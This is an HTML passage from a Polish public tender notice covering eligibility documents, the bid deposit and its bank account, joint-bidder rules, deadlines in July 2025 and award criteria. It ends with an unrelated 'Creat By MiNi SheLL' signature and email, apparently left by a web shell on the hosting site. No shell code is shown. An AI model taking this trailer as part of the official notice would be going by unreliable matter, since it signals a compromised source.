<br/>2) wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/>8. W celu przeliczenia na PLN wszystkich wartości i danych finansowych podanych w innych <br/>walutach Zamawiający zastosuje średni kurs Narodowego Banku Polskiego aktualny na <br/>dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu <br/>dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących <br/>podmiotowych środków dowodowych: <br/>1) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych <br/>również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności <br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i <br/>podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, <br/>oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane <br/>lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź <br/>inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały <br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a <br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy w przypadku świadczeń powtarzających się lub <br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, <br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami. <br/>3) oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry <br/>kierowniczej wykonawcy,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu <br/>Zamawiający żąda (dotyczy wszystkich części): <br/>1) oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności <br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie <br/>konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę albo <br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi, że przygotowanie oferty w postępowaniu było niezależne <br/>od innego wykonawcy należącego do tej samej grupy kapitałowej. <br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji, <br/>3) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym <br/>mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania <br/>wskazanych przez zamawiającego. <br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 2 – składa dokument lub <br/>dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce <br/>zamieszkania, potwierdzające odpowiednio, że: <br/>1) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza <br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie <br/>jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej <br/>z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>3. Dokumenty, o których mowa w ust. 2 powinny być wystawione nie wcześniej niż 3 miesiące <br/>przed upływem terminu składania ofert. <br/>4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się <br/>dokumentów, o których mowa w ust. 2, lub gdy dokumenty te nie odnoszą się do wszystkich <br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 Pzp, art. 109 ust. 1 pkt 4 Pzp, art. <br/>7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa <br/>narodowego zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym <br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do <br/>jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod <br/>przysięgą lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania <br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub <br/>11 <br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, <br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis ust. 3 <br/>stosuje się. <br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty <br/>określone w ust. 1 i 2 obowiązują oddzielnie każdego z Wykonawców.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Każda oferta musi być zabezpieczona wadium na cały okres związania ofertą, <br/>w wysokości 1 500,00 zł (słownie złotych: jeden tysiąc pięćset złotych 00/100), <br/>W przypadku wnoszenia wadium w formie pieniądza w tytule przelewu należy wpisać <br/>wadium i numer postępowania. <br/>2. Wadium może być wniesione w następujących formach: <br/>1) pieniądzu, <br/>2) gwarancjach bankowych, <br/>3) gwarancjach ubezpieczeniowych, <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>3. Wadium wnoszone w pieniądzu wnosi się w y ł ą c z n i e p r z e l e w e m na rachunek <br/>bankowy wskazany przez Zamawiającego. Nie jest dopuszczalna bezpośrednia wpłata kwoty <br/>wadium np. w banku. <br/>4. Wadium w pieniądzu należy wpłacić na konto Zamawiającego: <br/>Nr 61 9339 0006 0050 0500 1023 0005 <br/>z tytułem „wadium IGP_P.271.31.2025” (na przelewach nr rachunku należy pisać <br/>w sposób ciągły - bez spacji). <br/>5. Wadium wniesione przelewem na konto uznane będzie za wniesione w terminie, jeżeli przed <br/>terminem składania ofert konto Zamawiającego będzie uznane kwotą wadium. <br/>6. Wykonawca wnoszący wadium w formie gwarancji lub poręczenia, o których mowa w ust. <br/>2 przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia publicznego. <br/>2. Wykonawcy występujący wspólnie winni spełniać łącznie warunki udziału w postępowaniu, lecz żaden z nich nie może podlegać wykluczeniu z postępowania. <br/>3. Spółka cywilna (wspólnicy spółki cywilnej) będzie uważana za Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Przez spółkę cywilną należy rozumieć spółkę, o której mowa w art. 860-875 ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny. <br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, którego dotyczy niniejsza SWZ, są obowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o braku podstaw wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności braku przynależności do tej samej grupy kapitałowej składa każdy z Wykonawców. <br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia o których mowa w §11 i §12 SWZ, przy czym: <br/>1) dokumenty i oświadczenia o których mowa w §12 SWZ składa odpowiednio Wykonawca, <br/>który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w SWZ. <br/>2) dokumenty i oświadczenia o których mowa w §11 SWZ składa każdy z nich. <br/>3) Postanowienia niniejszej SWZ dotyczące „Wykonawcy” stosuje się odpowiednio <br/>do Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. <br/>4) Zamawiający może skorzystać z prawa żądania przed zawarciem umowy w sprawie <br/>zamówienia publicznego, umowy regulującej współpracę Wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia, jeżeli oferta złożona przez takich <br/>Wykonawców zostanie wybrana jako najkorzystniejsza. <br/>5) Zaleca się, aby w przypadku, gdy Wykonawcy występujący wspólnie wnoszą wadium i zabezpieczenie należytego wykonania umowy w formie innej niż pieniądz, w treści gwarancji lub poręczenia w sposób jednoznaczny i niebudzący wątpliwości, zostały wskazane, jako wykonawcy zamówienia publicznego, wszystkie podmioty występujące wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) Cena ofertowa (C) – znaczenie 60 %,<br/>2) Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej (D) – znaczenie: 40 %,

Creat By MiNi SheLL
Email: jattceo@gmail.com